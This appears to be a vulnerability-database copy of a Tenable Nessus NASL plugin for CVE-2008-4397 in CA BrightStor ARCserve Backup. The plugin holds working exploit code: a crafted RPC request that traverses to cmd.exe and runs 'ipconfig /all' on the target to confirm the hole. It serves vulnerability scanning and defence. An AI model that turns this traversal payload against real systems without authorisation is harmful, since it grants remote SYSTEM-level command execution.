Lucene search
This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.ARCSERVE_COMMAND_EXEC.NASLHistoryOct 14, 2008 - 12:00 a.m.
CA BrightStor ARCserve Backup RPC Interface (asdbapi.dll) Traversal Arbitrary Command Execution
2008-10-1400:00:00
This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.
www.tenable.com
83
This host is running BrightStor ARCServe for Windows.
The remote version of this software is affected by an arbitrary command execution vulnerability.
By sending a specially crafted packet to the RPC server on TCP port 6504, an unauthenticated, remote attacker may be able to execute code on the remote host with SYSTEM privileges.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(34393);
script_version("1.22");
script_cvs_date("Date: 2018/11/15 20:50:26");
script_cve_id("CVE-2008-4397");
script_bugtraq_id(31684);
script_name(english:"CA BrightStor ARCserve Backup RPC Interface (asdbapi.dll) Traversal Arbitrary Command Execution");
script_summary(english:"Check command execution in BrightStor ARCServe for Windows");
script_set_attribute(attribute:"synopsis", value:
"Arbitrary code can be executed on the remote host.");
script_set_attribute(attribute:"description", value:
"This host is running BrightStor ARCServe for Windows.
The remote version of this software is affected by an arbitrary
command execution vulnerability.
By sending a specially crafted packet to the RPC server on TCP port
6504, an unauthenticated, remote attacker may be able to execute code
on the remote host with SYSTEM privileges.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2008/Oct/88");
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?934ec85b");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2008/Oct/79");
script_set_attribute(attribute:"solution", value:
"Apply the relevant update referenced in the CA security notice.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_cwe_id(20, 22);
script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ca:arcserve_backup");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");
script_dependencies("smb_nativelanman.nasl");
script_require_keys("Host/OS/smb");
script_require_ports(6504);
exit(0);
}
include ('smb_func.inc');
function RPC_Bind ()
{
local_var ret, resp, soc;
soc = session_get_socket ();
ret = dce_rpc_bind(cid:session_get_cid(), uuid:"506b1890-14c8-11d1-bbc3-00805fa6962e ", vers:1);
send (socket:soc, data:ret);
resp = recv (socket:soc, length:4096);
if (!resp)
return -1;
ret = dce_rpc_parse_bind_ack (data:resp);
if (isnull (ret) || (ret != 0))
return -1;
return 0;
}
function RPC_ReportRemoteExecuteCML (host, windir, cmd)
{
local_var data, ret, resp, soc, tfile, len, code;
soc = session_get_socket ();
tfile = string ("nessus_", rand() & 0xFF, ".tmp");
session_set_unicode (unicode:0);
data =
class_name (name:host) +
class_name (name:"..\..\..\..\..\..\..\..\..\"+windir+"\system32\cmd /C echo " + '"') +
class_name (name:'" > %tmp%\\' + tfile + ' && for /f "tokens=6" %f in (%tmp%\\' + tfile + ') do ( ' + cmd + ' > %f ) && del %tmp%\\' + tfile ) +
class_name (name:"test2") +
raw_dword (d:0x20) +
raw_dword (d:0x20) +
crap(data:"A", length:0x20) +
raw_dword (d:0) +
raw_dword (d:0x400);
session_set_unicode (unicode:1);
ret = dce_rpc_request (code:0x156, data:data);
send (socket:soc, data:ret);
resp = recv (socket:soc, length:4096, timeout:20);
resp = dce_rpc_parse_response (data:resp);
len = strlen(resp);
code = get_dword (blob:resp, pos:len-4);
if (code != 0)
return NULL;
data = substr(resp, 12, len-8);
return data;
}
port = 6504;
if ( ! get_port_state(port) ) exit(0);
soc = open_sock_tcp (port);
if (!soc) exit (0);
session_init (socket:soc);
ret = RPC_Bind ();
if (ret != 0)
exit (0);
os = get_kb_item("Host/OS/smb");
if ("5.0" >< os)
windir = "winnt";
else
windir = "windows";
# Requires the real host name (not the ip address)
host = kb_smb_name();
cmd = "ipconfig /all";
ret = RPC_ReportRemoteExecuteCML (host:host, windir:windir, cmd:cmd);
if (!isnull(ret))
{
report = string (
"\nThe output of the command '", cmd, "' is:\n\n",
ret );
security_hole(port:port, extra:report);
}
close (soc);
| Vendor | Product | Version | CPE |
|---|---|---|---|
| ca | arcserve_backup | cpe:/a:ca:arcserve_backup |
Related
packetstorm
packetstorm
cabrightstor-exec.txt
2008-10-11 00:00:00
Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
2009-12-31 00:00:00
securityvulns
securityvulns
CA BrightStor ARCServe BackUp Message Engine Remote Command Injection Vulnerability
2008-10-14 00:00:00
CA ARCserve Backup Multiple Vulnerabilities
2008-10-12 00:00:00
CA ARCserve Backup multiple security vulnerabilities
2008-10-15 00:00:00
canvas
canvas
Immunity Canvas: BRIGHTSTOR_CMDEXEC
2008-10-14 21:10:00
prion
prion
Directory traversal
2008-10-14 21:10:00
cve
cve
CVE-2008-4397
2008-10-14 21:10:00
exploitpack
exploitpack
CA-ArcServe
2008-06-12 00:00:00
Related for ARCSERVE_COMMAND_EXEC.NASL